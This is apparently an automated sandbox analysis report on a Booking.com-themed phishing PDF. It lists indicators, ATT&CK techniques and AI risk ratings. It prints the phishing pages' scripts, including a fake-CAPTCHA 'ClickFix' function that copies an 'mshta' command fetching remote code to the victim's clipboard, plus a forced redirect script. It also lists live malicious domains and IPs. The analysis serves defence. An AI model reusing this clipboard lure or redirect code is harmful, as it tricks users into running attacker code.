Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Spearphishing Link	Windows Management Instrumentation	4 Browser Extensions	1 Process Injection	21 Masquerading	OS Credential Dumping	1 System Information Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iRMbIIEjhP.pdf	0%	Virustotal		Browse
iRMbIIEjhP.pdf	3%	ReversingLabs	Document-PDF.Phishing.Generic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7724_1931219489\Google.Widevine.CDM.dll	0%	ReversingLabs
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7724_1931219489\Google.Widevine.CDM.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
d2i5gg36g14bzn.cloudfront.net	18.245.31.129	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
e8652.dscx.akamaiedge.net	23.209.209.135	true	false	high
www.google.com	216.58.212.164	true	false	high
clintonmakes.com	66.63.187.216	true	false	high
fixecondfirbook.info	104.21.94.195	true	false	high
minedudiser.com	186.64.116.70	true	false	high
241.42.69.40.in-addr.arpa	unknown	unknown	false	high
x1.i.lencr.org	unknown	unknown	false	high
q-xx.bstatic.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://q-xx.bstatic.com/backend_static/common/flags/new/48-squared/us.png	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://wieistmeineip.de	sets.json.8.dr	false	high
https://mercadoshops.com.co	sets.json.8.dr	false	high
https://gliadomain.com	sets.json.8.dr	false	high
https://poalim.xyz	sets.json.8.dr	false	high
https://mercadolivre.com	sets.json.8.dr	false	high
https://reshim.org	sets.json.8.dr	false	high
https://nourishingpursuits.com	sets.json.8.dr	false	high
https://medonet.pl	sets.json.8.dr	false	high
https://unotv.com	sets.json.8.dr	false	high
https://mercadoshops.com.br	sets.json.8.dr	false	high
https://joyreactor.cc	sets.json.8.dr	false	high
https://zdrowietvn.pl	sets.json.8.dr	false	high
https://johndeere.com	sets.json.8.dr	false	high
https://songstats.com	sets.json.8.dr	false	high
https://baomoi.com	sets.json.8.dr	false	high
https://supereva.it	sets.json.8.dr	false	high
https://elfinancierocr.com	sets.json.8.dr	false	high
https://bolasport.com	sets.json.8.dr	false	high
https://rws1nvtvt.com	sets.json.8.dr	false	high
https://desimartini.com	sets.json.8.dr	false	high
https://hearty.app	sets.json.8.dr	false	high
https://hearty.gift	sets.json.8.dr	false	high
https://mercadoshops.com	sets.json.8.dr	false	high
https://heartymail.com	sets.json.8.dr	false	high
https://nlc.hu	sets.json.8.dr	false	high
https://p106.net	sets.json.8.dr	false	high
https://radio2.be	sets.json.8.dr	false	high
https://finn.no	sets.json.8.dr	false	high
https://hc1.com	sets.json.8.dr	false	high
https://kompas.tv	sets.json.8.dr	false	high
https://mystudentdashboard.com	sets.json.8.dr	false	high
https://songshare.com	sets.json.8.dr	false	high
https://smaker.pl	sets.json.8.dr	false	high
https://mercadopago.com.mx	sets.json.8.dr	false	high
https://p24.hu	sets.json.8.dr	false	high
https://talkdeskqaid.com	sets.json.8.dr	false	high
https://24.hu	sets.json.8.dr	false	high
https://mercadopago.com.pe	sets.json.8.dr	false	high
https://cardsayings.net	sets.json.8.dr	false	high
https://text.com	sets.json.8.dr	false	high
https://mightytext.net	sets.json.8.dr	false	high
https://pudelek.pl	sets.json.8.dr	false	high
https://hazipatika.com	sets.json.8.dr	false	high
https://joyreactor.com	sets.json.8.dr	false	high
https://cookreactor.com	sets.json.8.dr	false	high
https://wildixin.com	sets.json.8.dr	false	high
https://eworkbookcloud.com	sets.json.8.dr	false	high
https://cognitiveai.ru	sets.json.8.dr	false	high
https://nacion.com	sets.json.8.dr	false	high
https://chennien.com	sets.json.8.dr	false	high
https://drimer.travel	sets.json.8.dr	false	high
https://deccoria.pl	sets.json.8.dr	false	high
https://mercadopago.cl	sets.json.8.dr	false	high
https://talkdeskstgid.com	sets.json.8.dr	false	high
https://naukri.com	sets.json.8.dr	false	high
https://interia.pl	sets.json.8.dr	false	high
https://bonvivir.com	sets.json.8.dr	false	high
https://carcostadvisor.be	sets.json.8.dr	false	high
https://salemovetravel.com	sets.json.8.dr	false	high
https://sapo.io	sets.json.8.dr	false	high
https://wpext.pl	sets.json.8.dr	false	high
https://welt.de	sets.json.8.dr	false	high
https://poalim.site	sets.json.8.dr	false	high
https://drimer.io	sets.json.8.dr	false	high
https://infoedgeindia.com	sets.json.8.dr	false	high
https://blackrockadvisorelite.it	sets.json.8.dr	false	high
https://cognitive-ai.ru	sets.json.8.dr	false	high
https://cafemedia.com	sets.json.8.dr	false	high
https://graziadaily.co.uk	sets.json.8.dr	false	high
https://thirdspace.org.au	sets.json.8.dr	false	high
https://mercadoshops.com.ar	sets.json.8.dr	false	high
https://smpn106jkt.sch.id	sets.json.8.dr	false	high
https://elpais.uy	sets.json.8.dr	false	high
https://landyrev.com	sets.json.8.dr	false	high
https://the42.ie	sets.json.8.dr	false	high
https://commentcamarche.com	sets.json.8.dr	false	high
https://tucarro.com.ve	sets.json.8.dr	false	high
https://rws3nvtvt.com	sets.json.8.dr	false	high
https://eleconomista.net	sets.json.8.dr	false	high
https://helpdesk.com	sets.json.8.dr	false	high
https://mercadolivre.com.br	sets.json.8.dr	false	high
https://clmbtech.com	sets.json.8.dr	false	high
https://standardsandpraiserepurpose.com	sets.json.8.dr	false	high
https://07c225f3.online	sets.json.8.dr	false	high
https://salemovefinancial.com	sets.json.8.dr	false	high
https://mercadopago.com.br	sets.json.8.dr	false	high
https://zoom.us	sets.json.8.dr	false	high
https://commentcamarche.net	sets.json.8.dr	false	high
https://etfacademy.it	sets.json.8.dr	false	high
https://mighty-app.appspot.com	sets.json.8.dr	false	high
https://hj.rs	sets.json.8.dr	false	high
https://hearty.me	sets.json.8.dr	false	high
https://mercadolibre.com.gt	sets.json.8.dr	false	high
https://timesinternet.in	sets.json.8.dr	false	high
https://indiatodayne.in	sets.json.8.dr	false	high
https://idbs-staging.com	sets.json.8.dr	false	high
https://blackrock.com	sets.json.8.dr	false	high
https://idbs-eworkbook.com	sets.json.8.dr	false	high
https://motherandbaby.com	sets.json.8.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.212.164	www.google.com	United States	15169	GOOGLEUS	false
104.21.94.195	fixecondfirbook.info	United States	13335	CLOUDFLARENETUS	false
66.63.187.216	clintonmakes.com	United States	8100	ASN-QUADRANET-GLOBALUS	false
23.209.209.135	e8652.dscx.akamaiedge.net	United States	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
186.64.116.70	minedudiser.com	Chile	52368	ZAMLTDACL	false
18.245.31.129	d2i5gg36g14bzn.cloudfront.net	United States	16509	AMAZON-02US	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592941
Start date and time:	2025-01-16 17:18:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iRMbIIEjhP.pdf renamed because original name is a hash value
Original Sample Name:	5339ccf37589e64cee452ccf84b5b689c52a49b75d0244edb20dad60e99422dd.pdf
Detection:	MAL
Classification:	mal84.phis.winPDF@47/81@8/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .pdf Found PDF document URL browsing timeout or error Close Viewer

Errors

Corrupt sample or wrongly selected analyzer.

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 2.23.77.188, 184.28.88.176, 52.6.155.20, 52.22.41.97, 3.233.129.217, 3.219.243.226, 162.159.61.3, 172.64.41.3, 2.22.242.11, 2.22.242.123, 142.250.185.195, 172.217.16.206, 173.194.76.84, 216.58.212.174, 142.250.184.234, 142.250.186.42, 142.250.185.170, 142.250.186.138, 172.217.18.106, 142.250.185.74, 172.217.16.202, 216.58.206.74, 142.250.185.202, 142.250.185.234, 172.217.18.10, 216.58.212.138, 142.250.186.170, 142.250.185.138, 142.250.185.106, 142.250.186.74, 142.250.186.131, 216.58.206.42, 216.58.212.170, 142.250.181.234, 142.250.186.106, 142.250.185.206, 142.250.184.202, 172.217.23.106, 142.250.184.206, 142.250.81.238, 74.125.0.74, 199.232.210.172, 142.250.185.99, 34.104.35.123, 142.250.184.238, 13.107.246.45, 4.245.163.56, 2.23.242.162, 23.217.172.185, 40.69.42.241, 4.175.87.197
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, optimizationguide-pa.googleapis.com, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, r5.sn-t0aedn7e.gvt1.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, armmf.adobe.com, r5---sn-t0aedn7e.gvt1.com, clients.l.google.com, geo2.adobe.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:19:46	API Interceptor	1x Sleep call for process: AcroCEF.exe modified

LLM Input / Output

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: https://fixecondfirbook.info Model: Joe Sandbox AI	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": true, "third_party_hosting": true, "reasoning": "The domain appears to be attempting to typosquat 'facebook' with a jumbled version ('fixecondfirbook'). The .info TLD is often associated with suspicious domains. This is likely a malicious domain trying to impersonate Facebook." }
URL: https://fixecondfirbook.info
URL: https://clintonmakes.com/215c/#7ihbo... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script demonstrates high-risk behavior, including dynamic code execution and data exfiltration. It attempts to redirect the user to an untrusted domain, which is a strong indicator of malicious intent." }
function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); } async function process() { await sleep(0); if (window.location !== window.parent.location ) { top.location = "http://clintonmakes.com/215c/"; } else { window.location = "http://clintonmakes.com/215c/"; } } a369926= 12; window.onerror = process; process();
URL: https://fixecondfirbook.info/captchaHandler.js... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script has a moderate-risk indicator for external data transmission, as it sends the user's IP address to the '/send-ip' endpoint without any transparency or explanation. While this behavior may have a legitimate purpose, such as reCAPTCHA verification, the lack of context and potential privacy implications warrant further review." }
document.addEventListener('DOMContentLoaded', function() { const recaptchaCheckbox = document.querySelector('.recaptcha-checkbox'); if (recaptchaCheckbox) { recaptchaCheckbox.addEventListener('click', function() { // IP- fetch('/send-ip', { method: 'POST' }).then(response => { if (response.ok) { console.log(''); } else { console.error(''); } }); }); } });
URL: https://fixecondfirbook.info/... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The `copyToClipboard()` function generates a command that could be used for malicious purposes, and the script also manipulates the DOM to hide the reCAPTCHA checkbox and display a custom SVG element. These behaviors, combined with the suspicious intent and lack of transparency, indicate a high-risk script that should be further investigated." }
async function copyToClipboard() { var copyText = `mshta ${window.location.origin}/captcha # ''I am not a robot - reCAPTCHA Verification ID: 4345''` try { await navigator.clipboard.writeText(copyText); } catch (error) { } } function someEdit() { document.getElementsByClassName('recaptcha-checkbox')[0].style.display = 'none' document.getElementsByClassName("loadImg")[0].innerHTML = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" style="shape-rendering: auto; display: block; background: transparent;" width="32" height="32" xmlns:xlink="http://www.w3.org/1999/xlink"><g><circle stroke-dasharray="155.50883635269477 53.83627878423159" r="33" stroke-width="12" stroke="#4d90fe" fill="none" cy="50" cx="50"> <animateTransform keyTimes="0;1" values="0 50 50;360 50 50" dur="1.3888888888888888s" repeatCount="indefinite" type="rotate" attributeName="transform"></animateTransform> </circle><g></g></g></svg>` setTimeout(function () { document.getElementsByClassName('sjgdhfgas34')[0].style.display = "block" copyToClipboard() }, 2000) }
URL: https://fixecondfirbook.info/languageRevert.js... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script demonstrates some potentially concerning behaviors, such as preventing the default context menu and disabling keyboard shortcuts for changing the language. While these actions could be part of a legitimate feature, they may also indicate an attempt to restrict user control or prevent certain actions. Additionally, the use of a mutation observer to revert language changes could be an attempt to override user preferences. Overall, the script requires further review to determine the intent and potential impact." }
(function() { function revertLanguageChange() { if (document.documentElement.lang !== originalLang) { document.documentElement.lang = originalLang; } } const originalLang = document.documentElement.lang; const observer = new MutationObserver(revertLanguageChange); observer.observe(document.documentElement, { attributes: true, attributeFilter: ['lang'] }); document.addEventListener('contextmenu', function(event) { event.preventDefault(); }, false); document.addEventListener('keydown', function(event) { if ((event.ctrlKey \|\| event.metaKey) && event.shiftKey && event.key.toLowerCase() === 'l') { event.preventDefault(); } if (event.altKey && event.shiftKey && event.key.toLowerCase() === 'l') { event.preventDefault(); } }, false); })();
URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "View Complaint", "prominent_button_name": "View Complaint", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: PDF document Model: Joe Sandbox AI	{ "brands": [ "Booking.com" ] }
	{ "brands": [ "Booking.com" ] }
URL: https://fixecondfirbook.info/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: https://fixecondfirbook.info/ Model: Joe Sandbox AI	{ "brands": [ "Booking" ] }
	{ "brands": [ "Booking" ] }
URL: https://fixecondfirbook.info/ Model: Joe Sandbox AI	```json{ "legit_domain": "booking.com", "classification": "wellknown", "reasons": [ "The brand 'Booking' is well-known and is associated with the legitimate domain 'booking.com'.", "The URL 'fixecondfirbook.info' does not match the legitimate domain 'booking.com'.", "The URL contains suspicious elements such as misspellings and unusual domain extension '.info'.", "The domain name 'fixecondfirbook.info' does not have any clear association with the brand 'Booking'." ], "riskscore": 9} Google indexed: False
URL: fixecondfirbook.info Brands: Booking Input Fields: unknown

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
66.63.187.216	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	clintonmakes.com/favicon.ico
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	clintonmakes.com/favicon.ico
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	clintonmakes.com/favicon.ico
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	clintonmakes.com/favicon.ico
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	clintonmakes.com/favicon.ico
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	swxpeyou.com/favicon.ico
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	edwatsonsmallworks.com/favicon.ico
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	leahbdesign.com/favicon.ico
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	revelsocialclub.com/favicon.ico
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	ritarichards.com/favicon.ico
104.21.94.195	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse
	JlZU1N9b8M.pdf	Get hash	malicious	Unknown	Browse
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	ilCvGBnBTU.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
e8652.dscx.akamaiedge.net	V2yjcnvr6z.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	2.23.197.184
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	2.23.197.184
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	2.23.197.184
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
fixecondfirbook.info	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	104.21.94.195
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	104.21.94.195
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.168.162
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	172.67.168.162
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
d2i5gg36g14bzn.cloudfront.net	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.53
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.49
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.129
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.18
	ilCvGBnBTU.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.53
	https://page-get-reserves.com/yewhahgt/	Get hash	malicious	Unknown	Browse	18.245.31.18
	https://page-view-reserved-eng.com/mrzorecf	Get hash	malicious	Unknown	Browse	18.245.31.49
	https://page-view-reserved-en.com/erabwasi	Get hash	malicious	Unknown	Browse	18.245.31.18
clintonmakes.com	V2yjcnvr6z.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	104.21.94.195
	http://neuroplus.com.br/asset/payroll/portal/qybVCmrZMa/ben.fillowmen@ne.gov	Get hash	malicious	Unknown	Browse	104.17.25.14
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	https://www.google.com.vn/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%RANDOM4%wDnNeW8yycT&sa=t&esrc=nNeW8F%RANDOM3%A0xys8Em2FL&source=&cd=tS6T8%RANDOM3%Tiw9XH&cad=XpPkDfJX%RANDOM4%VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkayik.com.au/glyxzb/e7365d2bd9a2e2c8b5587a6a9eb341aa/YXdpbGxpYW1zQGtmb3JjZS5jb20=	Get hash	malicious	Unknown	Browse	104.17.25.14
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	172.67.168.162
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.94.195
	https://852u.adj.st/credits-opensea/?sk=288xDmHv&adj_t=wt0ujiy&adj_deep_link=eversheds-sutherlandpago://credits-opensea/?sk=288xDmHv&adj_label=MLM_MP_ML-EMAIL_CC_MARA_AO-UCR_ALL_ACT_X_X_DEFAULT_I-EG-UCR-MUTT-MAR-ABIERTO&adj_fallback=https://iondetox.com.ar/g63c/5617939594/Eversheds-sutherland/?eu=Y2xvemFub0BldmVyc2hlZHMtc3V0aGVybGFuZC5lcw==	Get hash	malicious	Unknown	Browse	188.114.96.3
	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig	Browse	104.21.96.1
	Menu.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.112.1
ASN-QUADRANET-GLOBALUS	V2yjcnvr6z.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	9L6HMvfoLW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	V2yjcnvr6z.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	weMSnq4Jjv.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	cx8VPbdfQI.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	23.209.209.135
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.209.209.135
	http://magentacloud.de/s/DeFCB6g8NjbfYpY	Get hash	malicious	Unknown	Browse	23.209.209.135

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	zvIajMhxeH.pdf	Get hash	malicious	Unknown	Browse	23.1.237.91
	ry36jFmHDq.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.1.237.91
	iE77tz35dc.pdf	Get hash	malicious	Unknown	Browse	23.1.237.91
	BIRWrYv55T.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.1.237.91
	OpoLADYwIE.pdf	Get hash	malicious	Unknown	Browse	23.1.237.91
	cCVZk5O7GW.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.1.237.91
	https://codverterassets.blob.core.windows.net/reps/a955/debugger/compiled.html	Get hash	malicious	Unknown	Browse	23.1.237.91
	Larissa Malmquist.docx	Get hash	malicious	Unknown	Browse	23.1.237.91
	vXn4pan2US.exe	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://lalclenfjhkinbn.top/1.php?s=527	Get hash	malicious	Unknown	Browse	23.1.237.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping7724_1931219489\Google.Widevine.CDM.dll	V2yjcnvr6z.pdf	Get hash	malicious	Unknown	Browse
	Mmcdonald-Employee-Benefits.docx	Get hash	malicious	Unknown	Browse
	Davx2k2025.doc	Get hash	malicious	Unknown	Browse
	mitel.docx	Get hash	malicious	Unknown	Browse
	https://forrestore.com/static/apps/437.zip	Get hash	malicious	Unknown	Browse
	Remittance.html	Get hash	malicious	Unknown	Browse
	Scan.html	Get hash	malicious	HTMLPhisher	Browse
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse
	Undelivered Messages.htm	Get hash	malicious	Unknown	Browse
	https://dev-alberta-ca.pantheonsite.io/?email=central@ngps.ca	Get hash	malicious	Unknown	Browse

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.189160223664588
Encrypted:	false
SSDEEP:	6:iO+DtSDM+q2P92nKuAl9OmbnIFUtUDtcAOwgZmwqDtcAOwDMVkwO92nKuAl9Omb5:7+IM+v4HAahFUtUy/qdMV5LHAaSJ
MD5:	047D54892F612D4AAB20DCBF2E9387F6
SHA1:	ACFE0D2C49863CE1060F91F075BB0DA474F90A84
SHA-256:	CDCD094F7410653CBD71EFC21A36868DD6F3C35044C08D69BC3E01A6B47EB975
SHA-512:	5509E634614F8AD0E9DC2DDBEF06DD7F79B2BDCF5DD9BE300CE990254C0D05CEB09628E79D1E466C6E84DC128AF62F0E54B2524527BE78B2271A80DC69B053FF
Malicious:	false
Reputation:	low
